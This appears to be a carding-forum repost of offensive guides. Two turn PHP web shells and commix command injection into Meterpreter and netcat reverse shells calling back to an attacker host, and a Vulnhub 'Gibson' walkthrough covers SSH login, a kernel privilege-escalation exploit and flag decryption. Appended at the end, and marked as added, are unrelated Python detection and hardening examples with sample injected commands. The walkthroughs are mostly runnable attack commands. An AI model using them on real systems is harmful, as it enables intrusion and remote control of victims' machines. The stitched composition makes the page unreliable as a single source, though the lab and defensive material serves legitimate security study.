Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc

[Guide] How to Webshell to Meterpreter
Through this article, you will learn how we can achieve a meterpreter shell after uploading a PHP backdoor script to the victim’s PC. You can read the previous article to upload a PHP web shell to a web server.

Type msfconsole to load the Metasploit framework:
use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 1
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 192.168.0.104
msf exploit(web_delivery) > set srvport 8081
msf exploit(web_delivery) > exploit


Copy the highlighted text shown in the window below.
[Image: 2.png?w=687&ssl=1]
Meterpreter shell using b374k
Now from the given screenshot, you can see that we have successfully uploaded the b374k script; now paste the malicious code copied above and execute it as a command.
[Image: 4.png?w=687&ssl=1]
When the above code gets executed you will get meterpreter session 1.
sessions -i 1
sysinfo


[Image: 5.png?w=687&ssl=1]
Meterpreter shell using c99 shell
Repeat the same process: after uploading the c99 script to the web server, paste the PHP code obtained through web delivery inside the c99 shell script and execute it as a command.
[Image: 7.png?w=687&ssl=1]
This will give you another meterpreter session.
sysinfo

[Image: 8.png?w=687&ssl=1]
Meterpreter shell using Weevely
Once you have uploaded the weevely backdoor to the web server, repeat the same process inside weevely as I have done: paste the malicious PHP code obtained through web delivery and hit enter.
[Image: 9.png?w=687&ssl=1]
Here one more session will get opened for the meterpreter shell.
sysinfo

[Image: 10.png?w=687&ssl=1]
Meterpreter shell using wso2.5.1.php
The next step is to get a meterpreter shell through the wso2.5.1.php script: again repeat the same web delivery step to get the malicious PHP code, paste that code into this script and execute it as a command.
[Image: 12.png?w=687&ssl=1]
Congrats! We have successfully accessed a meterpreter shell through different PHP scripts. Here we again have a meterpreter session.
sysinfo

[Image: 13.png?w=687&ssl=1]

Commix is an automated command injection tool. It lets you have a meterpreter session via command injection if the web application is vulnerable to it. It’s pretty efficient and reliable. Commix is widely used by security experts, penetration testers and also web developers in order to find vulnerabilities. In this article, we will learn how to get a meterpreter session using commix. A detailed guide on commix is available in a separate article.

Requirements :
  • DVWA (for Windows 10)
  • PentesterLab (for Linux testing)
  • Kali Linux
  • Commix
As you can see in the image below the environment of DVWA is vulnerable to command injection. Submit the local host request from DVWA.
[Image: 1.png?w=687&ssl=1]
Capture the previously submitted request through BurpSuite by simultaneously turning on the intercept as shown in the image below :
[Image: 2.png?w=687&ssl=1]
Once the cookies are captured, copy the whole cookie and paste it into a TXT file. Now, use the following command to exploit the command injection vulnerability in the DVWA environment :
commix -r /root/Desktop/req.txt

Here, -r refers to the path of the request file from which the HTTP request is loaded.
As the exploitation is successful, it will ask you if you want to load the pseudo terminal or not. Type ‘y’ for the pseudo terminal and it will be loaded. Use the command ‘whoami’ to check the user as shown in the image :
[Image: 3.png?w=687&ssl=1]
Now that you are in the pseudo terminal, type the following set of commands in order to generate a reverse shell :
reverse_tcp
set lhost 192.168.1.107
set lport 1234


After executing the above commands, it will ask you if you want to have a netcat shell or other (meterpreter) shell. So, press 2 for the meterpreter one. Then it will ask you which meterpreter session you want, as in whether you want it to be PHP, Windows, etc. As our DVWA is set up on Windows, we will select option 10. Then it will further ask you to choose a particular PowerShell injection. Choose 1 for now, as we will try the other options too.
[Image: 4.png?w=687&ssl=1]
When everything is done, it will give a resource file with the execution command. Open a new terminal window and type the command there, as in our case it generated the following command :
msfconsole -r /usr/share/commix/powershell_attack.rc

[Image: 5.png?w=687&ssl=1]
As the above command is executed, you will directly have your meterpreter session as shown in the image above.
Now, repeat the above steps as they are, but instead of choosing option 1 of the PowerShell injection, choose 2 this time, as it will help us get a meterpreter session through magic unicorn. After choosing option 2, it will again generate a resource file that is to be executed in the new terminal window. In our case the following command was generated :
msfconsole -r /usr/share/magic-unicorn/unicorn.rc

[Image: 6.png?w=687&ssl=1]
Again, when the command is executing you will have your meterpreter session as shown in the image below :
[Image: 7.png?w=687&ssl=1]
All the above meterpreter sessions were taken using option 10 under the category of the meterpreter reverse shell. But this time we will use option 11, which is web delivery, to have a meterpreter session. So, repeat the same steps as above, but this time choose option 11 when asked which meterpreter reverse shell you want.
[Image: 8.png?w=687&ssl=1]
Then, once you have chosen option 11, it will ask whether you want the web delivery script for PHP, Python or Windows. Now, as we are attacking Windows, select option 3.
[Image: 9.png?w=687&ssl=1]
Once again, it will give you a resource file and a command that is to be run in the new terminal window. In our case, the following command was generated :
msfconsole -r /usr/share/commix/web_delivery.rc

As the command is executed, you will have your meterpreter session as shown in the image below :
[Image: 10.png?w=687&ssl=1]
Until now, all the meterpreter sessions we took were in the Windows environment. Now, we will gain a meterpreter session in a Linux environment. For this, we will use PentesterLab.
[Image: 11.png?w=687&ssl=1]
Just like we did for windows, capture the cookies of pentesterlab in burp suite as shown in the image below :
[Image: 12.png?w=687&ssl=1]
Copy the contents of the cookies in a TXT file and use the following command to attack :
commix -r /root/Desktop/1.txt

As the exploitation is successful, it will ask you if you want to load the pseudo terminal or not. Type ‘y’ for the pseudo terminal and it will be loaded. Use the command ‘whoami’ to check the user as shown in the image :
[Image: 13.png?w=687&ssl=1]
Now that you are in the pseudo terminal, type the following set of commands in order to generate a reverse shell :
reverse_tcp
set lhost 192.168.1.107
set lport 1234


After executing the above commands, it will ask you if you want to have a netcat shell or other (meterpreter) shell. So, press 2 for the meterpreter one. Then it will ask you which meterpreter session you want as in whether you want it to be PHP, Windows, etc. As we are now testing on Linux, we will select option 8 i.e. a PHP meterpreter reverse shell.
[Image: 14.png?w=687&ssl=1]
Just like before, this too will generate a resource file which you have to execute in a new terminal window. In our case, the command generated was :
msfconsole -r /usr/share/commix/php_meterpreter.rc

As the above command is executed, you will have your session as shown in the image below :
[Image: 15.png?w=687&ssl=1]
The other method we will use to exploit Linux is by using web delivery. Repeat the above steps similarly, but instead of choosing option 8, this time choose option 11 for web delivery. And then choose option 2 for a PHP reverse shell.
[Image: 16.png?w=687&ssl=1]
Executing the above steps will create a resource file yet again. Run the command given in the new terminal window :
msfconsole -r /usr/share/commix/web_delivery.rc

[Image: 17.png?w=687&ssl=1]
Running the above command will give you your session as shown in the above image. This is how you can gain a meterpreter session through command injection vulnerability using commix. The session can be acquired in both Windows and Linux platforms.

Commix is an automated command injection tool. It lets you have a meterpreter or netcat session via command injection if the web application is vulnerable to it. It’s pretty efficient and reliable. Commix is widely used by security experts, penetration testers and also web developers in order to find vulnerabilities. In this article, we will learn how to get a netcat session using commix. A detailed guide on commix is available in a separate article.

Requirements :
  • PentesterLab (for Linux testing)
  • Kali Linux
  • Commix
As you can see in the image below the environment of PentesterLab is vulnerable to command injection.
[Image: 1.png?w=687&ssl=1]
Capture the cookies of PentesterLab in Burp Suite as shown in the image below :
[Image: 2.png?w=687&ssl=1]
Copy the contents of the cookies in a TXT file and use the following command to attack :
commix -r /root/Desktop/1.txt

As the exploitation is successful, it will ask you if you want to load the pseudo terminal or not. Type ‘y’ for the pseudo terminal and it will be loaded. Use the command ‘whoami’ to check the user as shown in the image :
[Image: 3.png?w=687&ssl=1]
Now that you are in the pseudo terminal, type the following set of commands in order to generate a reverse shell :
reverse_tcp
set lhost 192.168.1.107
set lport 4321


After executing the above commands, it will ask you if you want to have a netcat shell or other (meterpreter) shell. Choose option 1 as we will try to take a netcat session. Then choose option 1 to use default netcat settings for the target. Then type y to use /bin as your subdirectory.
[Image: 4.png?w=687&ssl=1]
Simultaneously, turn on the netcat listener by using the following command :
nc -lvp 4321

And as the execution of the steps goes right, you will have your session as shown in the image below :
[Image: 5.png?w=687&ssl=1]
Another method to get a netcat session is by using different settings of netcat. For this, repeat the above steps, but this time around, choose option 3 under the category of ‘unix-like targets’ for the traditional netcat settings.
[Image: 6.png?w=687&ssl=1]
Again, simultaneously start the netcat listener with the following command :
nc -lvp 1234

[Image: 7.png?w=687&ssl=1]
This way, you can use commix yet again to gain a netcat session through various methods.

Hello friends!! Welcome to our next CTF challenge from vulnhub, called “Gibson”, which is a boot-to-root challenge with the ultimate goal of getting the flag and finishing the task. This VM is designed to test your penetration testing skills by spawning the root shell of this machine, which is weakly configured, and the author has asked us to find the hidden flag through privilege escalation. You can download it from the link given below. I found this lab more interesting as it involves cyber forensics to get the final flag.
Download it from here:



Penetration Methodology
  • Network Scanning (Netdiscover, Nmap)
  • Abusing HTTP service for username & password
  • Spawning Pty shell SSH (Metasploit)
  • Privilege Escalation via Kernel exploit
  • Uploading LinEnum script
  • Obtain disk image
  • Forensic Analysis for extracting hidden flag.img
  • Decrypt GPG encrypted file using leet encoded value
  • Capture the Flag
Let’s start off with scanning the network to find our target’s IP.
netdiscover

[Image: 1.png?w=687&ssl=1]
As our target IP is 192.168.1.100, we now move to network enumeration; for this, we are going to scan the target IP using nmap, which will show all the open ports.
nmap -A 192.168.1.100

In this case, only two ports are open, i.e. 22 and 80; moreover, it has found an HTML file.
[Image: 2.png?w=687&ssl=1]
As the above result shows port 80 open, we will open the target IP in a browser.
[Image: 3.png?w=687&ssl=1]
It shows an accessible HTML page. But when we open it, we cannot see any crucial information there. It says the result will be found by brute force, but there is no place where we can apply brute force.
[Image: 4.png?w=687&ssl=1]
As we do not have any other option, let’s just go to the page source code to see if we can get any clue to move further in our task.
Ohhh!! Great, there is something which relates to a username and password; as per my prediction, god could be the possible password and margo could be the username.
[Image: 5.png?w=687&ssl=1]
Now from our nmap result, we saw port 22 open for SSH login. So let’s try to log in to SSH using the credentials found above, and for this, we will take the help of the Metasploit framework. By using the following module we can gain a meterpreter session once it is exploited successfully.
use auxiliary/scanner/ssh/ssh_login
msf auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.1.100
msf auxiliary(scanner/ssh/ssh_login) > set username margo
msf auxiliary(scanner/ssh/ssh_login) > set password god
msf auxiliary(scanner/ssh/ssh_login) > exploit


Hmm!! That’s great, we have compromised the target machine; you will love to see that the default opened session is a command shell session, which we then upgraded into a meterpreter session. Then run the “sysinfo” command to identify the system architecture.
As it was Ubuntu 14.04 (Linux 3.19.0-25-generic), I searched Google for a kernel exploit for privilege escalation.
[Image: 7.png?w=687&ssl=1]
Luckily, I found this kernel was badly affected by Overlayfs – a local privilege escalation. Superb, Metasploit has a built-in module for this exploit.
use exploit/linux/local/overlayfs_priv_esc
msf exploit(linux/local/overlayfs_priv_esc) > set session 1
msf exploit(linux/local/overlayfs_priv_esc) > set lhost 192.168.1.109
msf exploit(linux/local/overlayfs_priv_esc) > exploit


Here again you will love to see that the default opened session is a command shell session, which we then upgraded into a meterpreter session.
sessions -u 3

[Image: 8.png?w=687&ssl=1]
Now let’s upload LinEnum, a scripted local Linux enumeration and privilege escalation checks shell script that enumerates the system configuration and gives a high-level summary of the checks/tasks it performed.
To know more about the LinEnum script, visit the link given below:



upload /root/pentest/privs/LinEnum.sh .
chmod 777 LinEnum.sh
./LinEnum.sh


[Image: 9.png?w=687&ssl=1]
Here we get some interesting output, which is highlighted in the image below. It shows some external server is running.
[Image: 10.png?w=687&ssl=1]
Now from the process list, we see something like ftpserv, so we can just search for a file based on that.
find / -name 'ftpserv*'

Awesome, it gives us the “ftpserv.img” file, which can prove to be useful; let’s download it to our local machine with the help of the following command.
download /var/lib/libvirt/images/ftpserv.img /root/Desktop/

[Image: 11.png?w=687&ssl=1]
So let’s check what type of file it is. With the help of the file command, which showed the complete detail of the image file, we came to know that this image file is a partition boot sector, which contains all the information the file system uses to access the volume.
Now let’s find out the partition table of the device, with sizes given in sectors, with the help of the following command:
fdisk -lu ftpserv.img

Wonderful! It is a FAT16 file system, and as we have entered the forensic phase, you should have a little knowledge of cyber forensics. So we are going to use Sleuth Kit, a command-line forensic analysis toolkit, to list the file and directory names in this image with the help of the following command.
fls -f fat16 -o 63 ftpserv.img

Hmmm!! Here I found something very interesting, a “garbage” folder; let’s explore this by executing the command below.
fls -f fat16 -o 63 ftpserv.img 12

Awesome!! It was good to see an image file “flag.img” along with its inode number. An inode number holds metadata, and I’m pretty sure that we will track that information from inside flag.img. Let’s extract the content at that inode of ftpserv.img into flag.img and then mount it.
icat -f fat16 -o 63 ftpserv.img 845580 > flag.img
mount flag.img /mnt
cd /mnt
ls


Booom!! Here I saw the very interesting file “hint.txt”, which holds two links.
[Image: 12.png?w=687&ssl=1]
So when I visited both links, I found that “johnny lee miller” is a common character in both links, and in the hacker movie he is called “Zero Cool”.
Then we explored more and found the hidden directory /.trash, which holds an encrypted file flag.txt.gpg, but “zero Cool” wasn’t the correct passphrase and it took almost a whole day to decrypt it.
At last I thought from the hacker’s point of view and encoded “zero Cool” into leet, but unfortunately, I was unable to decrypt the encrypted file with the help of Z3r0C00l.
But finally, I obtained the correct passphrase Z3r0K00l by replacing the letter C with K, and executed the following command to decrypt the gpg encryption.
gpg --passphrase Z3r0K00l flag.txt.gpg

[Image: 15.png?w=687&ssl=1]
Hurray!! We successfully decrypted the file and obtained the flag.txt file.
[Image: 16.png?w=687&ssl=1]
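For defenders, the web shell and web delivery steps in the first guide leave one consistent host artifact: the web server process starts a shell or script interpreter. The following detection sketch is an added example, not part of the original post; the event format, the process-name sets and the sample events are constructed assumptions, with the listener address and port taken from the guide.

```python
import re

# Parent images that serve web requests. A shell or script interpreter started
# by one of these is what a web shell or command injection looks like on the host.
# Both sets are assumptions for this example; tune them to the estate.
WEB_PARENTS = {"apache2", "httpd", "httpd.exe", "nginx", "php-fpm",
               "php-cgi.exe", "w3wp.exe"}
INTERPRETERS = {"sh", "bash", "cmd.exe", "powershell.exe", "php", "php.exe",
                "python", "python.exe"}
URL_RE = re.compile(r"https?://([\w.\-]+)(?::(\d+))?", re.I)

# Constructed sample process-creation events: host|parent|child|command line.
SAMPLE_EVENTS = r"""
web01|httpd.exe|php.exe|php.exe -r "<loader fetching http://192.168.0.104:8081/x>"
web01|httpd.exe|cmd.exe|cmd.exe /c whoami
web01|httpd.exe|rotatelogs.exe|rotatelogs.exe logs/access.log 86400
ws07|explorer.exe|powershell.exe|powershell.exe -File C:\Scripts\backup.ps1
web02|apache2|sh|sh -c "ping -c 4 127.0.0.1; whoami"
"""


def parse_event(line):
    """Split one pipe-delimited event; the command line may itself contain '|'."""
    host, parent, child, cmdline = line.split("|", 3)
    return {"host": host, "parent": parent.lower(),
            "child": child.lower(), "cmdline": cmdline}


def reasons_for(ev):
    """Return the list of reasons an event is suspicious (empty if benign)."""
    if ev["parent"] not in WEB_PARENTS or ev["child"] not in INTERPRETERS:
        return []
    reasons = ["web server spawned an interpreter"]
    m = URL_RE.search(ev["cmdline"])
    if m:
        reasons.append("remote URL in command line: " + m.group(1))
        port = int(m.group(2)) if m.group(2) else None
        if port is not None and port not in (80, 443):
            reasons.append("non-standard port %d" % port)
    return reasons


def detect(text):
    """Run the rule over a block of events and return (host, child, reasons)."""
    findings = []
    for line in text.strip().splitlines():
        ev = parse_event(line)
        why = reasons_for(ev)
        if why:
            findings.append((ev["host"], ev["child"], why))
    return findings


if __name__ == "__main__":
    for host, child, why in detect(SAMPLE_EVENTS):
        print(host, child, "; ".join(why))
```

The same parent/child rule also covers the `whoami` probe that the commix pseudo terminal issues, since it runs under the web server account.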
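The DVWA page targeted in the commix guides is a ping form whose input reaches a shell, which is why a tool can append a second command. The following added example (not part of the original post) places that unsafe pattern beside a hardened form; the function names and sample form values are constructed for illustration, and a Linux `ping -c 4` is assumed.

```python
import ipaddress
import subprocess

# Characters that make a shell start, chain or substitute commands.
SHELL_META = set(";|&$`<>(){}\n")


def vulnerable_command(target):
    """Unsafe pattern: the form value is concatenated into a shell string."""
    return "ping -c 4 " + target


def smuggled_metachars(target):
    """Shell metacharacters the unsafe pattern would hand to the shell."""
    return sorted(set(target) & SHELL_META)


def hardened_argv(target):
    """Accept only an IP address literal and build an argv list (no shell).

    ipaddress.ip_address() raises ValueError for anything that is not a
    single IPv4/IPv6 literal, which also rejects values starting with '-'
    that would otherwise be read by ping as options.
    """
    addr = ipaddress.ip_address(target.strip())
    return ["ping", "-c", "4", str(addr)]


def ping(target, timeout=10):
    """Run ping without a shell; the argv list reaches exec unchanged."""
    return subprocess.run(hardened_argv(target), shell=False,
                          capture_output=True, text=True, timeout=timeout)


# Constructed form values: two normal, the rest carrying a second command
# or an injected option.
SAMPLES = ["127.0.0.1", "::1", "127.0.0.1; whoami", "127.0.0.1 && whoami",
           "127.0.0.1 | whoami", "$(whoami)", "-f 127.0.0.1"]


def audit(values):
    """Map each form value to the argv it would run, or None if rejected."""
    report = {}
    for value in values:
        try:
            report[value] = hardened_argv(value)
        except ValueError:
            report[value] = None
    return report


if __name__ == "__main__":
    for value, argv in audit(SAMPLES).items():
        print(repr(value), "->", argv if argv else "rejected",
              "| metachars:", smuggled_metachars(value))
```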
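The forensic phase of the Gibson walkthrough depends on reading the partition table to learn that the FAT16 file system starts at sector 63, the value passed to `fls` and `icat` with `-o`. The following MBR parser is an added example, not part of the original post; the sample boot sector is constructed (its partition size is invented), and only the start sector and the FAT16 type follow the walkthrough.

```python
import struct

SECTOR = 512
ENTRY = "<B3sB3sII"          # boot flag, CHS start, type, CHS end, LBA start, count
FAT16_TYPES = {0x04: "FAT16 (<32 MB)", 0x06: "FAT16", 0x0E: "FAT16 (LBA)"}


def build_sample_mbr():
    """Constructed sample: one FAT16 partition starting at sector 63."""
    mbr = bytearray(SECTOR)
    mbr[446:462] = struct.pack(ENTRY, 0x00, b"\x01\x01\x00", 0x06,
                               b"\x0f\x3f\x0c", 63, 16000)
    mbr[510:512] = b"\x55\xaa"           # boot signature
    return bytes(mbr)


def parse_mbr(sector0, image_sectors=None):
    """Return the non-empty primary partition entries of an MBR sector.

    image_sectors (optional) is the image size in sectors; entries that run
    past it are reported with in_bounds=False, a sign of a truncated image.
    """
    if len(sector0) < SECTOR or sector0[510:512] != b"\x55\xaa":
        raise ValueError("no MBR boot signature (0x55AA) at offset 510")
    parts = []
    for i in range(4):
        raw = sector0[446 + 16 * i: 462 + 16 * i]
        boot, _chs_start, ptype, _chs_end, start, count = struct.unpack(ENTRY, raw)
        if ptype == 0x00:                # unused slot
            continue
        parts.append({
            "index": i + 1,
            "bootable": boot == 0x80,
            "type": ptype,
            "fs": FAT16_TYPES.get(ptype, "type 0x%02x" % ptype),
            "start_sector": start,
            "byte_offset": start * SECTOR,
            "sectors": count,
            "in_bounds": image_sectors is None or start + count <= image_sectors,
        })
    return parts


def sleuthkit_args(part):
    """Arguments for fls/icat: -o takes the partition start in sectors."""
    if part["type"] not in FAT16_TYPES:
        raise ValueError("not a FAT16 partition entry")
    return ["-f", "fat16", "-o", str(part["start_sector"])]


if __name__ == "__main__":
    for p in parse_mbr(build_sample_mbr(), image_sectors=16063):
        print(p["index"], p["fs"], "start", p["start_sector"],
              "byte offset", p["byte_offset"], "args", sleuthkit_args(p))
```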